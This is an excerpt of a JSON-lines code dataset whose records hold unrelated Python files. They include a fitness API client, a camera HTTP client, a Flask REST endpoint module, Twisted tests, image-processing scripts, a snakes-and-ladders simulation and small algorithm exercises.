list_of_exercises.get('results',[]):\n list_of_exercises_ids.append(exercise.get('id'))\n if exercise_id not in list_of_exercises_ids:\n return False, f\"The exercise with id {exercise_id} doesn't exists in \" \\\n f\"day {day_id} and workout {workout_id}\"\n else:\n req1 = self.delete_req('set',exercise_id)\n return req1\n else:\n if day_id not in list_of_days_id:\n return False, f\"The days with id {day_id} doesn't exists in workout {workout_id}\"\n else:\n req2 = self.delete_req('day', day_id)\n return req2\n else:\n if workout_id not in list_of_workouts_ids:\n return False, f\"The workout with id {workout_id} doesn't exists\"\n else:\n req3 = self.delete_workout(workout_id)\n return req3\n else:\n req4 = self.delete_workout()\n return req4\n\n def delete_nutrition_plan(self,nutrtion_plan_id=None,meal_id=None,item_id=None):\n if nutrtion_plan_id is not None:\n list_of_nutrition_plans = self.get_req('nutritionplan')\n list_of_nutrition_plans_ids = list()\n for nutrition_plan in list_of_nutrition_plans[0].get('results',[]):\n list_of_nutrition_plans_ids.append(nutrition_plan.get('id'))\n\n if meal_id is not None:\n list_of_meals = self.get_req('meal')\n list_of_meals_id = list()\n for meal in list_of_meals[0].get('results',[]):\n list_of_meals_id.append(meal.get('id'))\n\n if item_id is not None:\n list_of_mealitems = self.get_req('mealitem')\n list_of_mealitems_ids = list()\n for item in list_of_mealitems[0].get('results',[]):\n list_of_mealitems_ids.append(item.get('id'))\n if item_id not in list_of_mealitems_ids:\n return False, f\"The item with id {item_id} doesn't exists in \" \\\n f\"meal {meal_id} and nutrition_plan {nutrtion_plan_id}\"\n else:\n req1 = self.delete_req('mealitem',item_id)\n return req1\n else:\n if meal_id not in list_of_meals_id:\n return False, f\"The meal with id {meal_id} doesn't exists in nutrition_plan {nutrtion_plan_id}\"\n else:\n req2 = self.delete_req('meal', meal_id)\n return req2\n else:\n if nutrtion_plan_id not in list_of_nutrition_plans_ids:\n return False, f\"The nutrition_plan_id with id {nutrtion_plan_id} doesn't exists\"\n else:\n req3 = self.delete_req('nutritionplan',nutrtion_plan_id)\n return req3\n else:\n req4 = self.delete_req('nutritionplan')\n return req4\n\n def get_random_num_outside_list(self, object):\n\n request = self.get_req(object)\n list_of_ids = list()\n for req in request[0].get('results', []):\n list_of_ids.append(req.get('id'))\n print(list_of_ids)\n num = random.choice(list_of_ids)\n while num in list_of_ids:\n num = random.randint(10000,99999)\n if num not in list_of_ids:\n return num\n\n\n #TOML part\n def parse_toml(self, toml_file):\n with open(toml_file) as file:\n data = file.read()\n parsed_toml = toml.loads(data)\n return parsed_toml\n\n def get_nutrition_plans_list(self,toml_file):\n a = self.parse_toml(toml_file=toml_file)\n dict1 = a.get('nutrition_plans')\n return dict1\n\n def get_nutrition_plans_meals(self,nutrition_plan,toml_file):\n b = self.get_nutrition_plans_list(toml_file)\n dict = b.get(nutrition_plan,{}).get(\"meals\",{})\n return dict\n\n def get_items_from_meals(self,nutrition_plan, meal,toml_file):\n list_of_meals = self.get_nutrition_plans_meals(nutrition_plan,toml_file)\n dict = list_of_meals.get(meal,{}).get(\"items\",{})\n return dict\n\n def get_workouts(self,file):\n a = self.parse_toml(toml_file=file)\n dict = a.get('workouts',{})\n return dict\n\n def get_workout_days(self,file, workout=None):\n a = self.get_workouts(file)\n dict = a.get(workout,{}).get(\"days\",{})\n return dict\n\n\n def get_exercises(self,file,workout=None,day=None):\n a = self.get_workout_days(file=file,workout=workout)\n dict = a.get(day,{}).get('exercises')\n return dict\n\n def get_exercises_settings(self,workout,day,exercise,file):\n a = self.get_exercises(workout=workout,day=day,file=file)\n dict = a.get(exercise,{}).get('settings',{})\n return dict\n\n def get_setting_informations(self,workout,day,exercise,setting,file):\n a = self.get_exercises_settings(workout,day,exercise,file)\n dict = a.get(setting,{})\n return dict\n\n #TOML part for nutrition plans\n\n def add_nutrition_plans_toml(self,toml_file_plans):\n parsed_toml = self.parse_toml(toml_file=toml_file_plans)\n if \"nutrition_plans\" in parsed_toml:\n nutrition_plans_dict = self.get_nutrition_plans_list(toml_file_plans)\n for nutrition_plan_key,nutrition_plan_value in nutrition_plans_dict.items():\n add_plan = self.create_nutrition_plan(description=nutrition_plan_key)\n nutrtion_plan_id = add_plan[0].json().get('id')\n if 'meals' in nutrition_plan_value:\n meals_dict = nutrition_plan_value.get('meals')\n self.add_meals_toml(meals_dict, nutrtion_plan_id)\n\n\n def add_meals_toml(self,meals_dict,nutrition_plan_id):\n\n for meal_key,meal_value in meals_dict.items():\n add_meal = self.create_meals_for_nutrition_plans(nutrition_plan_id)\n meal_id = add_meal[0].json().get('id')\n\n if 'items' in meal_value:\n items_dict = meal_value.get('items')\n self.add_item_toml(items_dict,meal_id)\n\n\n def add_item_toml(self,items_dict,meal_id):\n for item_key,item_value in items_dict.items():\n self.add_meal_item(meal_id,item_value.get('ingredient')\n ,item_value.get('amount'))\n\n\n\n #TOML part for Workouts\n def add_workouts_toml_file(self,file):\n toml_workouts = self.get_workouts(file=file)\n for workout_key,workout_value in toml_workouts.items():\n self.add_workout_day(workout_value.get('name'),\n workout_value.get('description'))\n\n if \"days\" in workout_value:\n toml_days = workout_value.get('days')\n self.add_days_for_workouts_toml(toml_days=toml_days,workout=workout_key)\n\n\n def add_days_for_workouts_toml(self,toml_days,workout):\n workout_id_req = self.name_to_id(param1='name',param1_value=workout,param2='id',object='workout')\n workout_id = workout_id_req[0]\n for day_key,day_val in toml_days.items():\n add_day1 = self.add_day(training=workout_id,description=day_val.get(\"description\"),\n day=day_val.get('day'))\n\n day_id = add_day1[0].json().get('id')\n\n if \"exercises\" in day_val:\n toml_exercise = day_val.get('exercises')\n self.add_exercise_per_day_toml(exercise_toml=toml_exercise,day_id=day_id)\n\n\n def add_exercise_per_day_toml(self,exercise_toml,day_id):\n for exercise_key, exercise_value in exercise_toml.items():\n add_exercise = self.add_exercise(day_id,sets=exercise_value.get('sets'),order=1)\n exercise_id = add_exercise[0].json().get('id')\n if 'settings' in exercise_value:\n toml_settings = exercise_value.get('settings')\n self.add_settings_per_exercise(toml_settings,exercise_id)\n\n\n\n def add_settings_per_exercise(self,toml_settings,exercise_id):\n for setting_key,setting_value in toml_settings.items():\n self.setting_exercise_set( set=exercise_id\n ,exercise=setting_value.get('exercise'),\n repetition_unit=setting_value.get('repetition_unit')\n ,reps=setting_value.get('reps')\n ,weight=setting_value.get('weight')\n ,weight_unit=setting_value.get('weight_unit')\n ,rir=setting_value.get('rir'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"502226629","text":"import httplib\nimport sys\n\n# python client.py CamID ON/OFF\n# python client.py CamID gethostname\n\n#get camera ID\ncamID = sys.argv[1]\n\ncmd = []\n#get http server ip\n#http_server = sys.argv[1]\n\nif sys.argv[2] == 'ON' or sys.argv[2] == 'OFF':\n\tif camID == 'cam0':\n\t\thttp_server = '10.156.14.197:8001'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('stream1.stream')\n\n\telif camID == 'cam1':\n\t\thttp_server = '10.156.14.197:8002'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('stream2.stream')\n\nelif sys.argv[2] == 'gethostname':\n\tif camID == 'cam0':\n\t\thttp_server = '10.156.14.197:8001'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('request.xml')\n\n\telif camID == 'cam1':\n\t\thttp_server = '10.156.14.197:8082'\n\t\tcmd.append(sys.argv[2])\n\t\tcmd.append('request.xml')\n\n\n\n#create a connection\nconn = httplib.HTTPConnection(http_server)\n\n'''\nwhile 1:\n cmd = raw_input('input command: ')\n cmd = cmd.split()\n\n if cmd[0] == 'exit': #type exit to end it\n break\n''' \n#request command to server\nconn.request(cmd[0], cmd[1])\n\n#get response from server\nrsp = conn.getresponse()\n \n#print server response and data\nprint(rsp.status, rsp.reason)\ndata_received = rsp.read()\nprint(data_received)\n\nconn.close()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"594691716","text":"def remove_smallest(lst):\n\tprint(lst)\n\t\n\t#Used for Empty Lists\n\tlstEmpty = []\n\t#Duplicate List used to identify smallest integer inside List to compare to with actual inputted list\n\tlstDuplicate = lst.copy()\n\t\n\tprint(lstDuplicate)\n\tlstDuplicate.sort()\n\tprint(lstDuplicate)\n\n\t#If inputted list is empty, return an empty list\n\tif (lst == lstEmpty):\n\t\t\treturn(lst)\n\tprint(\"Lowest value is \" + str(lstDuplicate[0]))\n\tlowestValue = lstDuplicate[0]\n\tlstLength = len(lst)\n\t\n\tfor i in range(lstLength):\n\t\tif (lst[i] == lowestValue):\n\t\t\tprint(lst[i])\n\t\t\tprint(\"HIT\")\n\t\t\tlst.pop(i)\n\t\t\tprint(lst)\n\t\t\treturn(lst)\n\t","sub_path":"edaBit/TheMuseumOfIncrediblyDullThings.py","file_name":"TheMuseumOfIncrediblyDullThings.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"381489981","text":"#!/usr/bin/python3\n\"\"\"[methods for amenities routing]\n\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom flask import Flask, jsonify, abort, request\nfrom models.amenity import Amenity\n\n\n@app_views.route('/amenities', strict_slashes=False)\ndef RetrieveAllAmenities():\n \"\"\"GET /amenities\n ---\n definitions:\n Amenities:\n type: object\n responses:\n 200:\n description: A list of amenities\n schema:\n $ref: '#/definitions/Amenities'\n \"\"\"\n objs = []\n amenity_values = storage.all(\"Amenity\").values()\n for obj in amenity_values:\n objs.append(obj.to_dict())\n return jsonify(objs)\n\n\n@app_views.route('/amenities/', strict_slashes=False)\ndef RetrieveAmenityObject(amenity_id):\n \"\"\"[RetrieveAmenityObject method]\n ---\n get:\n parameters:\n - name: amenity_id\n in: path\n type: string\n required: true\n default: all\n responses:\n 200:\n description: get an amenity\n \"\"\"\n amenity_values = storage.all(\"Amenity\").values()\n if amenity_id is not None:\n for obj in amenity_values:\n if obj.id == amenity_id:\n return jsonify(obj.to_dict())\n abort(404)\n\n\n@app_views.route('/amenities/', methods=['DELETE'],\n strict_slashes=False)\ndef DeleteAmenity(amenity_id):\n \"\"\"DELETE /amenities/:amenity_id\n ---\n delete:\n parameters:\n - name: amenity_id\n in: path\n type: string\n required: true\n default: all\n responses:\n 200:\n description: Delete an amenity\n \"\"\"\n deleted_amenity = storage.get(\"Amenity\", amenity_id)\n if deleted_amenity:\n storage.delete(deleted_amenity)\n storage.save()\n return jsonify({})\n abort(404)\n\n\n@app_views.route('/amenities', methods=['POST'], strict_slashes=False)\ndef PostAmenity():\n \"\"\"[post amenity method]\n ---\n post:\n consumes:\n - application/json\n parameters:\n - name: body\n in: body\n required:\n - key\n - value\n default: \"\"\n properties:\n key:\n type: string\n description: Unique identifier representing a key\n value:\n type: string\n description: Unique identifier representing a value\n responses:\n 201:\n description: post an amenity\n \"\"\"\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n elif \"name\" not in req.keys():\n abort(400, \"Missing name\")\n else:\n new_amenity = Amenity(**req)\n storage.new(new_amenity)\n storage.save()\n return jsonify(new_amenity.to_dict()), 201\n\n\n@app_views.route('/amenities/',\n methods=['PUT'],\n strict_slashes=False)\ndef PutAmenity(amenity_id=None):\n \"\"\"[PUT amenity method]\n ---\n put:\n consumes:\n - application/json\n parameters:\n - name: body\n in: body\n required:\n - key\n - value\n default: \"\"\n - name: amenity_id\n in: path\n type: string\n required: true\n description: amenity id\n properties:\n key:\n type: string\n description: Unique identifier representing a key\n value:\n type: string\n description: Unique identifier representing a value\n responses:\n 201:\n description: put an amenity\n \"\"\"\n updated_amenity = storage.get(\"Amenity\", amenity_id)\n if updated_amenity:\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n for k, v in req.items():\n if k in ['id', 'created_at', 'updated_at']:\n pass\n setattr(updated_amenity, k, v)\n storage.save()\n return jsonify(updated_amenity.to_dict())\n abort(404)\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504607129","text":"class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n pset=dict()\n n=len(s)\n for end in range(n,-1,-1):\n #[start,end) python/c++/java tradition!!!!!\n #end==n is the initial condition\n if end= 0:\n if self.buffer:\n msg = self.buffer + msg\n self.buffer = b''\n id, msg, data = data[:8], data[8:idx], data[idx+len(sep):]\n d = self.requests.pop(id)\n d.callback(to_string(msg))\n if data:\n self.dataReceived(data)\n else:\n self.buffer += data\n\n class EchoClientFactory(Factory):\n protocol = EchoClient\n\n def get_client(address):\n point = TCP4ClientEndpoint(reactor, *address)\n return point.connect(EchoClientFactory())\n\nexcept ImportError:\n twisted = None\n\n\n@unittest.skipUnless(twisted, 'Requires twisted')\nclass TestTwistedIntegration(unittest.TestCase):\n server_cfg = None\n\n @classmethod\n def setUpClass(cls):\n s = server(name=cls.__name__.lower(), bind='127.0.0.1:0')\n cls.server_cfg = yield pulsar.send('arbiter', 'run', s)\n cls.address = cls.server_cfg.addresses[0]\n\n @classmethod\n def tearDownClass(cls):\n if cls.server_cfg:\n return pulsar.send('arbiter', 'kill_actor', cls.server_cfg.name)\n\n def test_echo_client(self):\n client = yield get_client(self.address)\n self.assertTrue(client.connected)\n result = yield client('Hello')\n self.assertEqual(result, 'Hello')\n result = yield client('Ciao')\n self.assertEqual(result, 'Ciao')\n\n def test_multi_requests(self):\n client = yield get_client(self.address)\n results = yield multi_async((client('Msg%s' % n) for n in range(20)))\n self.assertEqual(len(results), 20)\n for n, result in enumerate(results):\n self.assertEqual(result, 'Msg%s' % n)\n\n\n@unittest.skipUnless(twisted, 'Requires twisted')\nclass TestPulsarReactor(unittest.TestCase):\n\n def test_meta(self):\n self.assertTrue(reactor.running)\n self.assertEqual(reactor.threadpool, None)\n self.assertEqual(reactor.waker, None)\n\n def test_switched_off_methods(self):\n self.assertRaises(NotImplementedError, reactor.spawnProcess)\n","sub_path":"examples/webmail/test_tx.py","file_name":"test_tx.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"488260445","text":"import numpy as np\r\nfrom skimage.transform import resize\r\nfrom skimage.util import crop, view_as_windows, view_as_blocks\r\nfrom sklearn.svm import LinearSVC\r\n\r\nimg_size = 33\r\ncell_size = 3\r\nblock_size = 2\r\nbincount = 9\r\n\r\ndef cells_creation(abs_grd, direction):\r\n angle = 180 // bincount\r\n cells_abs_grd = view_as_blocks(abs_grd, (cell_size, cell_size)).reshape((img_size // cell_size) ** 2, cell_size ** 2)\r\n cells_direction = view_as_blocks(direction, (cell_size, cell_size)).reshape((img_size // cell_size) ** 2, cell_size ** 2)\r\n tmp = np.zeros(((img_size // cell_size) ** 2, bincount))\r\n ind = cells_direction // angle\r\n corr = (cells_direction - ind * angle) / angle\r\n row_ind = np.arange(tmp.shape[0]).reshape(-1, 1)\r\n tmp[row_ind, ind] = cells_abs_grd * (1 - corr)\r\n ind += 1\r\n ind[ind == bincount] = 0\r\n tmp[row_ind, ind] += cells_abs_grd * corr\r\n return tmp.reshape(((img_size // cell_size), (img_size // cell_size), bincount))\r\n \r\ndef blocks_creation(cells):\r\n blocks = view_as_windows(cells, (block_size, block_size, bincount), (block_size // 2, block_size // 2, bincount))\r\n blocks = blocks.reshape(-1, block_size ** 2 * bincount)\r\n blocks /= np.sqrt(np.sum(blocks ** 2, axis=1) + 1e-5 ** 2)[:, np.newaxis]\r\n return blocks.ravel()\r\n \r\ndef extract_hog(img):\r\n if img.dtype.kind == 'u':\r\n img = img.astype(np.float64)\r\n h, w = img.shape[:2]\r\n h = int(h * 0.2)\r\n w = int(w * 0.2)\r\n img = crop(img, ((h, h), (w, w), (0, 0)))\r\n img = resize(img, (img_size, img_size))\r\n x_grd = np.empty(img.shape, np.float32)\r\n x_grd[0, :, :] = 0\r\n x_grd[-1, :, :] = 0\r\n x_grd[1:-1, :] = img[2:, :, :] - img[:-2, :, :]\r\n y_grd = np.empty(img.shape, np.float32)\r\n y_grd[:, 0, :] = 0\r\n y_grd[:, -1, :] = 0\r\n y_grd[:, 1:-1, :] = img[:, 2:, :] - img[:, :-2, :]\r\n abs_grd = np.hypot(x_grd, y_grd)\r\n max_ind = abs_grd.argmax(axis=2)\r\n row_ind = np.arange(img_size).reshape(-1, 1)\r\n x_grd = x_grd[row_ind, row_ind.T, max_ind]\r\n y_grd = y_grd[row_ind, row_ind.T, max_ind]\r\n abs_grd = abs_grd[row_ind, row_ind.T, max_ind]\r\n \r\n direction = np.rad2deg(np.arctan2(y_grd, x_grd)).astype(np.int32) % 180\r\n \r\n return blocks_creation(cells_creation(abs_grd, direction))\r\n \r\n \r\ndef fit_and_classify(train_x, train_y, test_x):\r\n model = LinearSVC(C=0.01)\r\n model.fit(train_x, train_y)\r\n predictions = model.predict(test_x)\r\n return predictions","sub_path":"3/fit_and_classify.py","file_name":"fit_and_classify.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"301111976","text":"import pytest\nfrom multiplai.evals.nlu import data\nfrom multiplai.evals.nlu import embedding as emb\nfrom multiplai.evals.nlu.data import WordIntentPair\nfrom multiplai.evals.nlu.gym.env import nlu_benchmark_env\n\n@pytest.fixture(scope='session')\ndef train_data():\n return data.load_train_data()\n\n\n@pytest.fixture(scope='session')\ndef _all_text_all_entities(train_data):\n return data.get_train_data_text_and_entities(train_data)\n@pytest.fixture(scope='session')\ndef embedding(train_data, _all_text_all_entities):\n all_text, all_entities = _all_text_all_entities\n return emb.get_embedding_for_text(all_text)\n\n@pytest.fixture(scope='session')\ndef all_entities(train_data, _all_text_all_entities):\n all_text, all_entities = _all_text_all_entities\n return all_entities\n\n@pytest.fixture(scope='session')\ndef train_pairs(train_data, embedding, all_entities):\n\n training_pairs = data.pairs_from_data(train_data['GetWeather'],\n all_entities=all_entities,\n embedding=embedding)\n return training_pairs\n\n\n@pytest.fixture\ndef single_example_env(train_data, embedding, all_entities):\n pairs = WordIntentPair.pairs_from_data(train_data['GetWeather'],\n all_entities=all_entities,\n embedding=embedding)\n\n n_words = len(embedding.token_to_idx.keys())\n n_labels = len(all_entities)\n\n env = nlu_benchmark_env.SingleExampleEnvBase(pairs=pairs,\n n_symbols=n_words,\n n_classes=n_labels)\n return env","sub_path":"multiplai/evals/nlu/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"9606891","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n#\n# This is SELFICIOUS by Yuuta\n# UPDATED: 2010-12-17 15:55:46\n\nimport logging\nimport datetime\nimport urllib\nfrom xml.dom import minidom\nimport dateutil.parser\nimport tornado.web\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import memcache\n\n\ndef parse_xml_bookmarks(data):\n \"\"\"Parses delcicious xml export and returns a list of bookmarks\"\"\"\n bookmarks = []\n dom = minidom.parseString(data)\n for node in dom.getElementsByTagName('post'):\n bookmarks.append({\n 'hash':node.getAttribute('hash'),\n 'url':node.getAttribute('href'),\n 'title':node.getAttribute('description'),\n 'description':node.getAttribute('extended'),\n 'tags':node.getAttribute('tag').split(' '),\n 'time':dateutil.parser.parse(node.getAttribute('time'))\n })\n return bookmarks\n \ndef keygen(format, *args, **kwargs):\n \"\"\"generates a key from args and kwargs using format\"\"\"\n allargs = args+tuple(kwargs[key] for key in sorted(kwargs.keys()))\n key = format % allargs[0:format.count('%')]\n return key\n\ndef memoize(keyformat, time=600, cache_null=False):\n \"\"\"Decorator to memoize functions using memcache.\"\"\"\n def decorator(fxn):\n def wrapper(self, *args, **kwargs):\n key = keygen(keyformat, *args, **kwargs)\n data = memcache.get(key)\n if data is not None:\n logging.info('From memcache: %s' % key)\n return data\n data = fxn(self, *args, **kwargs)\n if data or cache_null:\n memcache.set(key, data, time)\n return data\n return wrapper\n return decorator\n\ndef unmemoize(keys_list):\n memcache.delete_multi(keys_list)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327451619","text":"\n# coding: utf-8\n\n# In[20]:\n\nmax_snakes=15\nmax_ladders=15\nboard_size =(10,10)\n\ntotal_test_cases = 0\ntest_cases = {}\nimport random\n\n\n# In[21]:\n\ndef read_input(filename):\n with open(filename, 'r') as fd:\n inputs = fd.readlines()\n total_test_cases = int(inputs.pop(0).strip('\\n'))\n for i in range(total_test_cases):\n die_probabilities = list(map(float, inputs[4*i + 0].strip('\\n').split(',')))\n assert len(die_probabilities == 6)\n n_ladders, n_snakes = list(map(int, inputs[4*i + 1].strip('\\n').split(',')))\n\n ladders = [tuple(list(map(int, each.split(',')))) for each in inputs[4*i + 2].strip('\\n').split(' ')]\n snakes = [tuple(list(map(int,each.split(',')))) for each in inputs[i*4 + 3].strip('\\n').split(' ')]\n assert(len(ladders) == n_ladders)\n assert(len(snakes) == n_snakes)\n test_cases[i+1] = [die_probabilities, (n_ladders, n_snakes), ladders, snakes]\n assert len(test_cases) == total_test_cases\n\n\n\n# In[ ]:\n\ndef update_snakes_and_ladders(game, die_end_pos):\n ladders = game[2]\n snakes = game[3]\n #Nicely the input data has ladders in right (low start to high end ) and snakes in ulta. so I can pull this off\n for lad in ladders + snakes:\n if lad[0] == die_end_pos:\n return lad[1]\n return die_end_pos\n\n pass\n\ndef choose_die_value(die_probs):\n # Assuming two decimal point accuracy\n source =''.join([ str(i+1)*int(100*each) for i,each in enumerate(die_probs)])\n chosen = random.choice(source)\n return chosen\n\n\n# Simulate 5000 games and find mean game end time\ndef simulate_game(game):\n n_simulations = 5000\n #n_simulations = 10000\n all_moves_total = 0\n all_comp_games_cnt = 0\n for i in range(n_simulations):\n player_pos=0\n moves = 0\n die_probs = game[0]\n while (moves <=1000):\n die_choose = choose_die_value(die_probs)\n moves += 1\n prev_pos = player_pos\n player_pos += int(die_choose)\n player_pos = update_snakes_and_ladders(game, player_pos)\n # If the die move ends up > 100. ignore it\n if player_pos > 100:\n player_pos = prev_pos\n moves -= 1\n if player_pos==100:\n all_moves_total += moves\n all_comp_games_cnt += 1\n break\n print(all_moves_total/all_comp_games_cnt)\n\n\n\n# In[ ]:\n\nread_input('./snakes_and_ladders_input.txt')\nfor each in test_cases.values():\n simulate_game(each)\n\n#import pdb; pdb.set_trace()\n#simulate_game(test_cases[1])\n\n# Hmm.. looks like the 2nd test case falls out of the +/- 10% range in my simulation.\n# Ah well. for now just shrugging shoulders.... later should construct more test cases and test.\n\n# Ironically doubling the num. of simulations doesn't change a thing.. still same 120 or so moves\n# for second board/test case...\n\n# should try keep the probabilities and change the num. of snakes and ladders(or difference between num.of\n# snakes and ladders)\n#hmmm... Should try same num. of snakes and ladders next time changing the probabilities\n","sub_path":"SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156632016","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n \n # bfs\n queue = list()\n if root == None:\n return queue\n \n result = dict()\n explored = set()\n \n queue.append((root, 0))\n result[0] = [root.val]\n\n while len(queue) > 0:\n node, depth = queue.pop(0)\n if node not in explored:\n explored.add(node)\n \n for child in node.children:\n if child not in explored:\n child_depth = depth + 1\n queue.append((child, child_depth))\n if child_depth in result:\n result[child_depth].append(child.val)\n else:\n result[child_depth] = [child.val]\n\n return list(result.values())","sub_path":"429-n-ary-tree-level-order-traversal.py","file_name":"429-n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"503570800","text":"from leeyzer import solution, timeit, Solution, make_tree, TreeNode\n\n# @Date: 2019/4/25\n# @Author: *** \n# @description:\n\"\"\"\nExample:\n\nInput: [0,1,0,3,12]\nOutput: [1,3,12,0,0]\nNote:\n\nYou must do this in-place without making a copy of the array.\nMinimize the total number of operations.\n\n\"\"\"\n\nclass Q283_Move_Zeroes(Solution):\n @timeit\n @solution\n def Q283_Move_Zeroes1(self, nums):\n zero = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n\n \n \n @timeit\n @solution\n def Q283_Move_Zeroes2(self, nums):\n nums.sort(key=lambda x: 1 if x == 0 else 0)\n # nums.sort(key=bool, reverse=True)\n\n \n\ndef main():\n q = Q283_Move_Zeroes()\n q.add_args([0,1,0,3,12])\n # q.add_args()\n q.test()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"top100_liked/283_Move_Zeroes.py","file_name":"283_Move_Zeroes.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"177655235","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 6 23:37:17 2020\r\n\r\n@author: 86131\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport skimage\r\n\r\nfrom skimage import img_as_float,img_as_ubyte\r\n\r\nfrom skimage import *\r\nfrom skimage.filters import threshold_sauvola\r\nfrom os import listdir \r\n\r\ndef threshold(t, img):\r\n th_img = img.copy()\r\n th_img[th_img>t] = 255\r\n th_img[th_img<=t] = 0\r\n return th_img\r\n \r\ndef threshold_HSV(t, img):\r\n th_img = img.copy()\r\n th_img[th_img>t] = 255\r\n th_img[th_img<=t] = 0\r\n return th_img\r\n \r\ndef lap(img):\r\n img_lap = cv2.GaussianBlur(img, (3, 3), 0)\r\n ddepth = cv2.CV_16S\r\n kernel_size = 3\r\n img_lap = cv2.Laplacian(img_lap, ddepth, ksize=kernel_size)\r\n img_lap = 255 - img_lap\r\n '''\r\n plt.hist(img.ravel(), 256,[0,256])\r\n plt.show()\r\n '''\r\n img_lap = threshold(230, img_lap)\r\n return img_lap\r\n\r\ndef thre_sauvola(img, windowsize):\r\n thresh_sauvola = threshold_sauvola(img, window_size=windowsize)\r\n binary_sauvola = img > thresh_sauvola\r\n return binary_sauvola\r\n\r\ndef skimage2opencv(src):\r\n src *= 255\r\n src.astype(int)\r\n cv2.cvtColor(src,cv2.COLOR_RGB2BGR)\r\n return src\r\n\r\nfor i in range(5):\r\n img_ori = cv2.imread(f\"try/{i}.jpg\")\r\n img = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\r\n \r\n img_0 = lap(img)\r\n cv2.imwrite(f\"Laplacian/{i}.png\",img_0)\r\n \r\n img_1 = thre_sauvola(img, 21)\r\n img_1 = img_as_ubyte(img_1)\r\n cv2.imwrite(f\"threshold_sauvola_21/{i}.png\",img_1)\r\n \r\n img_2 = thre_sauvola(img, 17)\r\n img_2 = img_as_ubyte(img_2)\r\n cv2.imwrite(f\"threshold_sauvola_17/{i}.png\",img_2)\r\n \r\n img_HSV = cv2.cvtColor(img_ori, cv2.COLOR_BGR2HSV)\r\n img_V = cv2.split(img_HSV)[2]\r\n img_3 = thre_sauvola(img_V, 17)\r\n img_3 = img_as_ubyte(img_3)\r\n cv2.imwrite(f\"threshold_sauvola_17_HSV/{i}.png\",img_3)\r\n \r\n img_4 = thre_sauvola(img_V, 21)\r\n img_4 = img_as_ubyte(img_4)\r\n cv2.imwrite(f\"threshold_sauvola_21_HSV/{i}.png\",img_4)\r\n\r\n\r\n# try global thre on HSV\r\n\r\n'''\r\nimg = cv2.imread(\"try/1.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\nplt.hist(img[0].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nplt.hist(img[1].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nplt.hist(img[2].ravel(), 256,[0,256])\r\nplt.show()\r\n\r\nimg_0 = cv2.inRange(img, (0, 0, 100), (255, 255, 255))\r\n\r\ncv2.imwrite(\"1.png\",img_0)\r\n\r\nimg_1 = thre_sauvola(img[2], 21)\r\nskimage.io.imsave(\"2.png\",img_as_uint(img_1))\r\n'''\r\n\r\n# try local thre in HSV\r\n\r\n'''\r\nimg = cv2.imread(\"try/1.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nh=cv2.split(img)[0]\r\ns=cv2.split(img)[1]\r\nv=cv2.split(img)[2]\r\nimg_0 = thre_sauvola(h, 13)\r\nimg_1 = thre_sauvola(s, 13)\r\nimg_2 = thre_sauvola(v, 17)\r\n\r\nimg_0 = img_as_ubyte(img_0)\r\nimg_1 = img_as_ubyte(img_1)\r\nimg_2 = 